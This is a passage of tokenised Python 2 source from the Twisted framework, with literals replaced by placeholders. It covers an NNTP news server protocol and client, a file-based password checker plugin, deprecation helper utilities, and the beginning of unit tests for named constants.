<EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_LIST ( self , subcmd = '<STR_LIT>' , * dummy ) : <EOL> subcmd = subcmd . strip ( ) . lower ( ) <EOL> if subcmd == '<STR_LIT>' : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> self . sendLine ( '<STR_LIT:.>' ) <EOL> elif subcmd == '<STR_LIT>' : <EOL> defer = self . factory . backend . overviewRequest ( ) <EOL> defer . addCallbacks ( self . _gotOverview , self . _errOverview ) <EOL> log . msg ( '<STR_LIT>' ) <EOL> elif subcmd == '<STR_LIT>' : <EOL> defer = self . factory . backend . subscriptionRequest ( ) <EOL> defer . addCallbacks ( self . _gotSubscription , self . _errSubscription ) <EOL> log . msg ( '<STR_LIT>' ) <EOL> elif subcmd == '<STR_LIT>' : <EOL> defer = self . factory . backend . listRequest ( ) <EOL> defer . addCallbacks ( self . _gotList , self . _errList ) <EOL> else : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def _gotList ( self , list ) : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> for i in list : <EOL> self . sendLine ( '<STR_LIT>' % tuple ( i ) ) <EOL> self . sendLine ( '<STR_LIT:.>' ) <EOL> def _errList ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def _gotSubscription ( self , parts ) : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> for i in parts : <EOL> self . sendLine ( i ) <EOL> self . sendLine ( '<STR_LIT:.>' ) <EOL> def _errSubscription ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def _gotOverview ( self , parts ) : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> for i in parts : <EOL> self . sendLine ( i + '<STR_LIT::>' ) <EOL> self . sendLine ( '<STR_LIT:.>' ) <EOL> def _errOverview ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_LISTGROUP ( self , group = None ) : <EOL> group = group or self . currentGroup <EOL> if group is None : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> else : <EOL> defer = self . factory . backend . listGroupRequest ( group ) <EOL> defer . addCallbacks ( self . _gotListGroup , self . _errListGroup ) <EOL> def _gotListGroup ( self , ( group , articles ) ) : <EOL> self . currentGroup = group <EOL> if len ( articles ) : <EOL> self . currentIndex = int ( articles [ <NUM_LIT:0> ] ) <EOL> else : <EOL> self . currentIndex = None <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> for i in articles : <EOL> self . sendLine ( str ( i ) ) <EOL> self . sendLine ( '<STR_LIT:.>' ) <EOL> def _errListGroup ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_XOVER ( self , range ) : <EOL> if self . currentGroup is None : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> else : <EOL> l , h = parseRange ( range ) <EOL> defer = self . factory . backend . xoverRequest ( self . currentGroup , l , h ) <EOL> defer . addCallbacks ( self . _gotXOver , self . _errXOver ) <EOL> def _gotXOver ( self , parts ) : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> for i in parts : <EOL> self . sendLine ( '<STR_LIT:\t>' . join ( map ( str , i ) ) ) <EOL> self . sendLine ( '<STR_LIT:.>' ) <EOL> def _errXOver ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def xhdrWork ( self , header , range ) : <EOL> if self . currentGroup is None : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> else : <EOL> if range is None : <EOL> if self . currentIndex is None : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> return <EOL> else : <EOL> l = h = self . currentIndex <EOL> else : <EOL> l , h = parseRange ( range ) <EOL> if l is h is None : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> else : <EOL> return self . factory . backend . xhdrRequest ( self . currentGroup , l , h , header ) <EOL> def do_XHDR ( self , header , range = None ) : <EOL> d = self . xhdrWork ( header , range ) <EOL> if d : <EOL> d . addCallbacks ( self . _gotXHDR , self . _errXHDR ) <EOL> def _gotXHDR ( self , parts ) : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> for i in parts : <EOL> self . sendLine ( '<STR_LIT>' % i ) <EOL> self . sendLine ( '<STR_LIT:.>' ) <EOL> def _errXHDR ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_POST ( self ) : <EOL> self . inputHandler = self . _doingPost <EOL> self . message = '<STR_LIT>' <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def _doingPost ( self , line ) : <EOL> if line == '<STR_LIT:.>' : <EOL> self . inputHandler = None <EOL> group , article = self . currentGroup , self . message <EOL> self . message = '<STR_LIT>' <EOL> defer = self . factory . backend . postRequest ( article ) <EOL> defer . addCallbacks ( self . _gotPost , self . _errPost ) <EOL> else : <EOL> self . message = self . message + line + '<STR_LIT:\r\n>' <EOL> def _gotPost ( self , parts ) : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def _errPost ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_CHECK ( self , id ) : <EOL> d = self . factory . backend . articleExistsRequest ( id ) <EOL> d . addCallbacks ( self . _gotCheck , self . _errCheck ) <EOL> def _gotCheck ( self , result ) : <EOL> if result : <EOL> self . sendLine ( "<STR_LIT>" ) <EOL> else : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def _errCheck ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_TAKETHIS ( self , id ) : <EOL> self . inputHandler = self . _doingTakeThis <EOL> self . message = '<STR_LIT>' <EOL> def _doingTakeThis ( self , line ) : <EOL> if line == '<STR_LIT:.>' : <EOL> self . inputHandler = None <EOL> article = self . message <EOL> self . message = '<STR_LIT>' <EOL> d = self . factory . backend . postRequest ( article ) <EOL> d . addCallbacks ( self . _didTakeThis , self . _errTakeThis ) <EOL> else : <EOL> self . message = self . message + line + '<STR_LIT:\r\n>' <EOL> def _didTakeThis ( self , result ) : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def _errTakeThis ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_GROUP ( self , group ) : <EOL> defer = self . factory . backend . groupRequest ( group ) <EOL> defer . addCallbacks ( self . _gotGroup , self . _errGroup ) <EOL> def _gotGroup ( self , ( name , num , high , low , flags ) ) : <EOL> self . currentGroup = name <EOL> self . currentIndex = low <EOL> self . sendLine ( '<STR_LIT>' % ( num , low , high , name ) ) <EOL> def _errGroup ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def articleWork ( self , article , cmd , func ) : <EOL> if self . currentGroup is None : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> else : <EOL> if not article : <EOL> if self . currentIndex is None : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> else : <EOL> article = self . currentIndex <EOL> else : <EOL> if article [ <NUM_LIT:0> ] == '<STR_LIT:<>' : <EOL> return func ( self . currentGroup , index = None , id = article ) <EOL> else : <EOL> try : <EOL> article = int ( article ) <EOL> return func ( self . currentGroup , article ) <EOL> except ValueError : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_ARTICLE ( self , article = None ) : <EOL> defer = self . articleWork ( article , '<STR_LIT>' , self . factory . backend . articleRequest ) <EOL> if defer : <EOL> defer . addCallbacks ( self . _gotArticle , self . _errArticle ) <EOL> def _gotArticle ( self , ( index , id , article ) ) : <EOL> self . currentIndex = index <EOL> self . sendLine ( '<STR_LIT>' % ( index , id ) ) <EOL> s = basic . FileSender ( ) <EOL> d = s . beginFileTransfer ( article , self . transport ) <EOL> d . addCallback ( self . finishedFileTransfer ) <EOL> def finishedFileTransfer ( self , lastsent ) : <EOL> if lastsent != '<STR_LIT:\n>' : <EOL> line = '<STR_LIT>' <EOL> else : <EOL> line = '<STR_LIT:.>' <EOL> self . sendLine ( line ) <EOL> def _errArticle ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_STAT ( self , article = None ) : <EOL> defer = self . articleWork ( article , '<STR_LIT>' , self . factory . backend . articleRequest ) <EOL> if defer : <EOL> defer . addCallbacks ( self . _gotStat , self . _errStat ) <EOL> def _gotStat ( self , ( index , id , article ) ) : <EOL> self . currentIndex = index <EOL> self . sendLine ( '<STR_LIT>' % ( index , id ) ) <EOL> def _errStat ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_HEAD ( self , article = None ) : <EOL> defer = self . articleWork ( article , '<STR_LIT>' , self . factory . backend . headRequest ) <EOL> if defer : <EOL> defer . addCallbacks ( self . _gotHead , self . _errHead ) <EOL> def _gotHead ( self , ( index , id , head ) ) : <EOL> self . currentIndex = index <EOL> self . sendLine ( '<STR_LIT>' % ( index , id ) ) <EOL> self . transport . write ( head + '<STR_LIT:\r\n>' ) <EOL> self . sendLine ( '<STR_LIT:.>' ) <EOL> def _errHead ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_BODY ( self , article ) : <EOL> defer = self . articleWork ( article , '<STR_LIT>' , self . factory . backend . bodyRequest ) <EOL> if defer : <EOL> defer . addCallbacks ( self . _gotBody , self . _errBody ) <EOL> def _gotBody ( self , ( index , id , body ) ) : <EOL> self . currentIndex = index <EOL> self . sendLine ( '<STR_LIT>' % ( index , id ) ) <EOL> self . lastsent = '<STR_LIT>' <EOL> s = basic . FileSender ( ) <EOL> d = s . beginFileTransfer ( body , self . transport ) <EOL> d . addCallback ( self . finishedFileTransfer ) <EOL> def _errBody ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_NEXT ( self ) : <EOL> i = self . currentIndex + <NUM_LIT:1> <EOL> defer = self . factory . backend . articleRequest ( self . currentGroup , i ) <EOL> defer . addCallbacks ( self . _gotStat , self . _errStat ) <EOL> def do_LAST ( self ) : <EOL> i = self . currentIndex - <NUM_LIT:1> <EOL> defer = self . factory . backend . articleRequest ( self . currentGroup , i ) <EOL> defer . addCallbacks ( self . _gotStat , self . _errStat ) <EOL> def do_MODE ( self , cmd ) : <EOL> cmd = cmd . strip ( ) . upper ( ) <EOL> if cmd == '<STR_LIT>' : <EOL> self . servingSlave = <NUM_LIT:0> <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> elif cmd == '<STR_LIT>' : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> else : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_QUIT ( self ) : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> self . transport . loseConnection ( ) <EOL> def do_HELP ( self ) : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> self . sendLine ( '<STR_LIT:.>' ) <EOL> def do_SLAVE ( self ) : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> self . servingeSlave = <NUM_LIT:1> <EOL> def do_XPATH ( self , article ) : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_XINDEX ( self , article ) : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_XROVER ( self , range = None ) : <EOL> """<STR_LIT>""" <EOL> self . do_XHDR ( '<STR_LIT>' , range ) <EOL> def do_IHAVE ( self , id ) : <EOL> self . factory . backend . articleExistsRequest ( id ) . addCallback ( self . _foundArticle ) <EOL> def _foundArticle ( self , result ) : <EOL> if result : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> else : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> self . inputHandler = self . _handleIHAVE <EOL> self . message = '<STR_LIT>' <EOL> def _handleIHAVE ( self , line ) : <EOL> if line == '<STR_LIT:.>' : <EOL> self . inputHandler = None <EOL> self . factory . backend . postRequest ( <EOL> self . message <EOL> ) . addCallbacks ( self . _gotIHAVE , self . _errIHAVE ) <EOL> self . message = '<STR_LIT>' <EOL> else : <EOL> self . message = self . message + line + '<STR_LIT:\r\n>' <EOL> def _gotIHAVE ( self , result ) : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def _errIHAVE ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> class UsenetClientProtocol ( NNTPClient ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , groups , date , storage ) : <EOL> """<STR_LIT>""" <EOL> NNTPClient . __init__ ( self ) <EOL> self . groups , self . date , self . storage = groups , date , storage <EOL> def connectionMade ( self ) : <EOL> NNTPClient . connectionMade ( self ) <EOL> log . msg ( "<STR_LIT>" + str ( self . transport . getPeer ( ) ) ) <EOL> self . setStream ( ) <EOL> self . fetchNewNews ( self . groups , self . date , '<STR_LIT>' ) <EOL> def articleExists ( self , exists , article ) : <EOL> if exists : <EOL> self . fetchArticle ( article ) <EOL> else : <EOL> self . count = self . count - <NUM_LIT:1> <EOL> self . disregard = self . disregard + <NUM_LIT:1> <EOL> def gotNewNews ( self , news ) : <EOL> self . disregard = <NUM_LIT:0> <EOL> self . count = len ( news ) <EOL> log . msg ( "<STR_LIT>" + str ( self . count ) + "<STR_LIT>" + str ( self . transport . getPeer ( ) ) ) <EOL> for i in news : <EOL> self . storage . articleExistsRequest ( i ) . addCallback ( self . articleExists , i ) <EOL> def getNewNewsFailed ( self , reason ) : <EOL> log . msg ( "<STR_LIT>" + reason + "<STR_LIT>" + str ( self . transport . getPeer ( ) ) ) <EOL> self . quit ( ) <EOL> def gotArticle ( self , article ) : <EOL> self . storage . postRequest ( article ) <EOL> self . count = self . count - <NUM_LIT:1> <EOL> if not self . count : <EOL> log . msg ( "<STR_LIT>" + str ( self . transport . getPeer ( ) ) ) <EOL> if self . disregard : <EOL> log . msg ( "<STR_LIT>" % ( self . disregard , ) ) <EOL> self . factory . updateChecks ( self . transport . getPeer ( ) ) <EOL> self . quit ( ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from zope . interface import implements <EOL> from twisted import plugin <EOL> from twisted . cred . checkers import FilePasswordDB <EOL> from twisted . cred . strcred import ICheckerFactory <EOL> from twisted . cred . credentials import IUsernamePassword , IUsernameHashedPassword <EOL> fileCheckerFactoryHelp = """<STR_LIT>""" <EOL> invalidFileWarning = '<STR_LIT>' <EOL> class FileCheckerFactory ( object ) : <EOL> """<STR_LIT>""" <EOL> implements ( ICheckerFactory , plugin . IPlugin ) <EOL> authType = '<STR_LIT:file>' <EOL> authHelp = fileCheckerFactoryHelp <EOL> argStringFormat = '<STR_LIT>' <EOL> credentialInterfaces = ( IUsernamePassword , IUsernameHashedPassword ) <EOL> errorOutput = sys . stderr <EOL> def generateChecker ( self , argstring ) : <EOL> """<STR_LIT>""" <EOL> from twisted . python . filepath import FilePath <EOL> if not argstring . strip ( ) : <EOL> raise ValueError , '<STR_LIT>' % self . authType <EOL> elif not FilePath ( argstring ) . isfile ( ) : <EOL> self . errorOutput . write ( '<STR_LIT>' % ( invalidFileWarning , argstring ) ) <EOL> return FilePasswordDB ( argstring ) <EOL> theFileCheckerFactory = FileCheckerFactory ( ) </s>
<s> """<STR_LIT>""" <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> import sys , inspect <EOL> from warnings import warn , warn_explicit <EOL> from dis import findlinestarts <EOL> from twisted . python . versions import getVersionString <EOL> from twisted . python . util import mergeFunctionMetadata <EOL> DEPRECATION_WARNING_FORMAT = '<STR_LIT>' <EOL> def _fullyQualifiedName ( obj ) : <EOL> """<STR_LIT>""" <EOL> name = obj . __name__ <EOL> if inspect . isclass ( obj ) or inspect . isfunction ( obj ) : <EOL> moduleName = obj . __module__ <EOL> return "<STR_LIT>" % ( moduleName , name ) <EOL> elif inspect . ismethod ( obj ) : <EOL> className = _fullyQualifiedName ( obj . im_class ) <EOL> return "<STR_LIT>" % ( className , name ) <EOL> return name <EOL> _fullyQualifiedName . __module__ = '<STR_LIT>' <EOL> _fullyQualifiedName . __name__ = '<STR_LIT>' <EOL> def getWarningMethod ( ) : <EOL> """<STR_LIT>""" <EOL> return warn <EOL> def setWarningMethod ( newMethod ) : <EOL> """<STR_LIT>""" <EOL> global warn <EOL> warn = newMethod <EOL> def _getDeprecationDocstring ( version , replacement = None ) : <EOL> """<STR_LIT>""" <EOL> doc = "<STR_LIT>" % ( getVersionString ( version ) , ) <EOL> if replacement : <EOL> doc = "<STR_LIT>" % ( doc , _getReplacementString ( replacement ) ) <EOL> return doc + "<STR_LIT:.>" <EOL> def _getReplacementString ( replacement ) : <EOL> """<STR_LIT>""" <EOL> if callable ( replacement ) : <EOL> replacement = _fullyQualifiedName ( replacement ) <EOL> return "<STR_LIT>" % ( replacement , ) <EOL> def _getDeprecationWarningString ( fqpn , version , format = None , replacement = None ) : <EOL> """<STR_LIT>""" <EOL> if format is None : <EOL> format = DEPRECATION_WARNING_FORMAT <EOL> warningString = format % { <EOL> '<STR_LIT>' : fqpn , <EOL> '<STR_LIT:version>' : getVersionString ( version ) } <EOL> if replacement : <EOL> warningString = "<STR_LIT>" % ( <EOL> warningString , _getReplacementString ( replacement ) ) <EOL> return warningString <EOL> def getDeprecationWarningString ( callableThing , version , format = None , <EOL> replacement = None ) : <EOL> """<STR_LIT>""" <EOL> return _getDeprecationWarningString ( <EOL> _fullyQualifiedName ( callableThing ) , version , format , replacement ) <EOL> def deprecated ( version , replacement = None ) : <EOL> """<STR_LIT>""" <EOL> def deprecationDecorator ( function ) : <EOL> """<STR_LIT>""" <EOL> warningString = getDeprecationWarningString ( <EOL> function , version , None , replacement ) <EOL> def deprecatedFunction ( * args , ** kwargs ) : <EOL> warn ( <EOL> warningString , <EOL> DeprecationWarning , <EOL> stacklevel = <NUM_LIT:2> ) <EOL> return function ( * args , ** kwargs ) <EOL> deprecatedFunction = mergeFunctionMetadata ( <EOL> function , deprecatedFunction ) <EOL> _appendToDocstring ( deprecatedFunction , <EOL> _getDeprecationDocstring ( version , replacement ) ) <EOL> deprecatedFunction . deprecatedVersion = version <EOL> return deprecatedFunction <EOL> return deprecationDecorator <EOL> def _appendToDocstring ( thingWithDoc , textToAppend ) : <EOL> """<STR_LIT>""" <EOL> if thingWithDoc . __doc__ : <EOL> docstringLines = thingWithDoc . __doc__ . splitlines ( ) <EOL> else : <EOL> docstringLines = [ ] <EOL> if len ( docstringLines ) == <NUM_LIT:0> : <EOL> docstringLines . append ( textToAppend ) <EOL> elif len ( docstringLines ) == <NUM_LIT:1> : <EOL> docstringLines . extend ( [ '<STR_LIT>' , textToAppend , '<STR_LIT>' ] ) <EOL> else : <EOL> spaces = docstringLines . pop ( ) <EOL> docstringLines . extend ( [ '<STR_LIT>' , <EOL> spaces + textToAppend , <EOL> spaces ] ) <EOL> thingWithDoc . __doc__ = '<STR_LIT:\n>' . join ( docstringLines ) <EOL> class _InternalState ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , proxy ) : <EOL> object . __setattr__ ( self , '<STR_LIT>' , proxy ) <EOL> def __getattribute__ ( self , name ) : <EOL> return object . __getattribute__ ( object . __getattribute__ ( self , '<STR_LIT>' ) , <EOL> name ) <EOL> def __setattr__ ( self , name , value ) : <EOL> return object . __setattr__ ( object . __getattribute__ ( self , '<STR_LIT>' ) , <EOL> name , value ) <EOL> class _ModuleProxy ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , module ) : <EOL> state = _InternalState ( self ) <EOL> state . _module = module <EOL> state . _deprecatedAttributes = { } <EOL> state . _lastWasPath = False <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> state = _InternalState ( self ) <EOL> return '<STR_LIT>' % ( type ( self ) . __name__ , state . _module ) <EOL> def __setattr__ ( self , name , value ) : <EOL> """<STR_LIT>""" <EOL> state = _InternalState ( self ) <EOL> state . _lastWasPath = False <EOL> setattr ( state . _module , name , value ) <EOL> def __getattribute__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> state = _InternalState ( self ) <EOL> if state . _lastWasPath : <EOL> deprecatedAttribute = None <EOL> else : <EOL> deprecatedAttribute = state . _deprecatedAttributes . get ( name ) <EOL> if deprecatedAttribute is not None : <EOL> value = deprecatedAttribute . get ( ) <EOL> else : <EOL> value = getattr ( state . _module , name ) <EOL> if name == '<STR_LIT>' : <EOL> state . _lastWasPath = True <EOL> else : <EOL> state . _lastWasPath = False <EOL> return value <EOL> class _DeprecatedAttribute ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , module , name , version , message ) : <EOL> """<STR_LIT>""" <EOL> self . module = module <EOL> self . __name__ = name <EOL> self . fqpn = module . __name__ + '<STR_LIT:.>' + name <EOL> self . version = version <EOL> self . message = message <EOL> def get ( self ) : <EOL> """<STR_LIT>""" <EOL> result = getattr ( self . module , self . __name__ ) <EOL> message = _getDeprecationWarningString ( self . fqpn , self . version , <EOL> DEPRECATION_WARNING_FORMAT + '<STR_LIT>' + self . message ) <EOL> warn ( message , DeprecationWarning , stacklevel = <NUM_LIT:3> ) <EOL> return result <EOL> def _deprecateAttribute ( proxy , name , version , message ) : <EOL> """<STR_LIT>""" <EOL> _module = object . __getattribute__ ( proxy , '<STR_LIT>' ) <EOL> attr = _DeprecatedAttribute ( _module , name , version , message ) <EOL> _deprecatedAttributes = object . __getattribute__ ( <EOL> proxy , '<STR_LIT>' ) <EOL> _deprecatedAttributes [ name ] = attr <EOL> def deprecatedModuleAttribute ( version , message , moduleName , name ) : <EOL> """<STR_LIT>""" <EOL> module = sys . modules [ moduleName ] <EOL> if not isinstance ( module , _ModuleProxy ) : <EOL> module = _ModuleProxy ( module ) <EOL> sys . modules [ moduleName ] = module <EOL> _deprecateAttribute ( module , name , version , message ) <EOL> def warnAboutFunction ( offender , warningString ) : <EOL> """<STR_LIT>""" <EOL> offenderModule = sys . modules [ offender . __module__ ] <EOL> filename = inspect . getabsfile ( offenderModule ) <EOL> lineStarts = list ( findlinestarts ( offender . func_code ) ) <EOL> lastLineNo = lineStarts [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] <EOL> globals = offender . func_globals <EOL> kwargs = dict ( <EOL> category = DeprecationWarning , <EOL> filename = filename , <EOL> lineno = lastLineNo , <EOL> module = offenderModule . __name__ , <EOL> registry = globals . setdefault ( "<STR_LIT>" , { } ) , <EOL> module_globals = None ) <EOL> if sys . version_info [ : <NUM_LIT:2> ] < ( <NUM_LIT:2> , <NUM_LIT:5> ) : <EOL> kwargs . pop ( '<STR_LIT>' ) <EOL> warn_explicit ( warningString , ** kwargs ) </s>
<s> """<STR_LIT>""" <EOL> from twisted . trial . unittest import TestCase <EOL> from twisted . python . constants import ( <EOL> NamedConstant , Names , ValueConstant , Values , FlagConstant , Flags ) <EOL> class NamedConstantTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> class foo ( Names ) : <EOL> pass <EOL> self . container = foo <EOL> def test_name ( self ) : <EOL> """<STR_LIT>""" <EOL> name = NamedConstant ( ) <EOL> name . _realize ( self . container , "<STR_LIT:bar>" , None ) <EOL> self . assertEqual ( "<STR_LIT:bar>" , name . name ) <EOL> def test_representation ( self ) : <EOL> """<STR_LIT>""" <EOL> name = NamedConstant ( ) <EOL> name . _realize ( self . container , "<STR_LIT:bar>" , None ) <EOL> self . assertEqual ( "<STR_LIT>" , repr ( name ) ) <EOL> def test_equality ( self ) : <EOL> """<STR_LIT>""" <EOL> name = NamedConstant ( ) <EOL> name . _realize ( self . container , "<STR_LIT:bar>" , None ) <EOL> self . assertTrue ( name == name ) <EOL> self . assertFalse ( name != name ) <EOL> def test_nonequality ( self ) : <EOL> """<STR_LIT>""" <EOL> first = NamedConstant ( ) <EOL> first . _realize ( self . container , "<STR_LIT:bar>" , None ) <EOL> second = NamedConstant ( ) <EOL> second . _realize ( self . container , "<STR_LIT:bar>" , None ) <EOL> self . assertFalse ( first == second ) <EOL> self . assertTrue ( first != second ) <EOL> def test_hash ( self ) : <EOL> """<STR_LIT>""" <EOL> first = NamedConstant ( ) <EOL> first . _realize ( self . container , "<STR_LIT:bar>" , None ) <EOL> second = NamedConstant ( ) <EOL> second . _realize ( self . container , "<STR_LIT:bar>" , None ) <EOL> self . assertNotEqual ( hash ( first ) , hash ( second ) ) <EOL> class _ConstantsTestsMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> def _notInstantiableTest ( self , name , cls ) : <EOL> """<STR_LIT>""" <EOL> exc = self . assertRaises ( TypeError , cls ) <EOL> self . assertEqual ( name + "<STR_LIT>" , str ( exc ) ) <EOL> class NamesTests ( TestCase , _ConstantsTestsMixin ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> class METHOD ( Names ) : <EOL> """<STR_LIT>""" <EOL> GET = NamedConstant ( ) <EOL> PUT = NamedConstant ( ) <EOL> POST = NamedConstant ( ) <EOL> DELETE = NamedConstant ( ) <EOL> self . METHOD = METHOD <EOL> def test_notInstantiable ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _notInstantiableTest ( "<STR_LIT>" , self . METHOD ) <EOL> def test_symbolicAttributes ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertTrue ( hasattr ( self . METHOD , "<STR_LIT:GET>" ) ) <EOL> self . assertTrue ( hasattr ( self . METHOD , "<STR_LIT>" ) ) <EOL> self . assertTrue ( hasattr ( self . METHOD , "<STR_LIT:POST>" ) ) <EOL> self . assertTrue ( hasattr ( self . METHOD , "<STR_LIT>" ) ) <EOL> def test_withoutOtherAttributes ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( hasattr ( self . METHOD , "<STR_LIT:foo>" ) ) <EOL> def test_representation ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( "<STR_LIT>" , repr ( self . METHOD . GET ) ) <EOL> def test_lookupByName ( self ) : <EOL> """<STR_LIT>""" <EOL> method = self . METHOD . lookupByName ( "<STR_LIT:GET>" ) <EOL> self . assertIdentical ( self . METHOD . GET , method ) <EOL> def test_notLookupMissingByName ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( ValueError , self . METHOD . lookupByName , "<STR_LIT>" ) <EOL> self . assertRaises ( ValueError , self . METHOD . lookupByName , "<STR_LIT>" ) <EOL> self . assertRaises ( ValueError , self . METHOD . lookupByName , "<STR_LIT:foo>" ) <EOL> def test_name ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( "<STR_LIT:GET>" , self . METHOD . GET . name ) <EOL> def test_attributeIdentity ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertIdentical ( self . METHOD . GET , self . METHOD . GET ) <EOL> def test_iterconstants ( self ) : <EOL> """<STR_LIT>""" <EOL> constants = list ( self . METHOD . iterconstants ( ) ) <EOL> self . assertEqual ( <EOL> [ self . METHOD . GET , self . METHOD . PUT , <EOL> self . METHOD . POST , self . METHOD . DELETE ] , <EOL> constants ) <EOL> def test_attributeIterconstantsIdentity ( self ) : <EOL> """<STR_LIT>""" <EOL> constants = list ( self . METHOD . iterconstants ( ) ) <EOL> self . assertIdentical ( self . METHOD . GET , constants [ <NUM_LIT:0> ] ) <EOL> self . assertIdentical ( self . METHOD . PUT , constants [ <NUM_LIT:1> ] ) <EOL> self . assertIdentical ( self . METHOD . POST , constants [ <NUM_LIT:2> ] ) <EOL> self . assertIdentical ( self . METHOD . DELETE , constants [ <NUM_LIT:3> ] ) <EOL> def test_iterconstantsIdentity ( self ) : <EOL> """<STR_LIT>""" <EOL> constants = list ( self . METHOD . iterconstants ( ) ) <EOL> again = list ( self . METHOD . iterconstants ( ) ) <EOL> self . assertIdentical ( again [ <NUM_LIT:0> ] , constants [ <NUM_LIT:0> ] ) <EOL> self . assertIdentical ( again [ <NUM_LIT:1> ] , constants [ <NUM_LIT:1> ] ) <EOL> self . assertIdentical ( again [ <NUM_LIT:2> ] , constants [ <NUM_LIT:2> ] ) <EOL> self . assertIdentical ( again [ <NUM_LIT:3> ] , constants [ <NUM_LIT:3> ] ) <EOL> def test_initializedOnce ( self ) : <EOL> """<STR_LIT>""" <EOL> first = self . METHOD . _enumerants <EOL> self . METHOD . GET <EOL> second = self . METHOD . _enumerants <EOL> self . assertIdentical ( first , second ) <EOL> class ValuesTests ( TestCase , _ConstantsTestsMixin ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> class STATUS ( Values ) : <EOL> OK = ValueConstant ( "<STR_LIT>" ) <EOL> NOT_FOUND = ValueConstant ( "<STR_LIT>" ) <EOL> self . STATUS = STATUS <EOL> def test_notInstantiable ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _notInstantiableTest ( "<STR_LIT>" , self . STATUS ) <EOL> def test_symbolicAttributes ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertTrue ( hasattr ( self . STATUS , "<STR_LIT:OK>" ) ) <EOL> self . assertTrue ( hasattr ( self . STATUS , "<STR_LIT>" ) ) <EOL> def test_withoutOtherAttributes ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( hasattr ( self . STATUS , "<STR_LIT:foo>" ) ) <EOL> def test_representation ( self ) : <EOL> 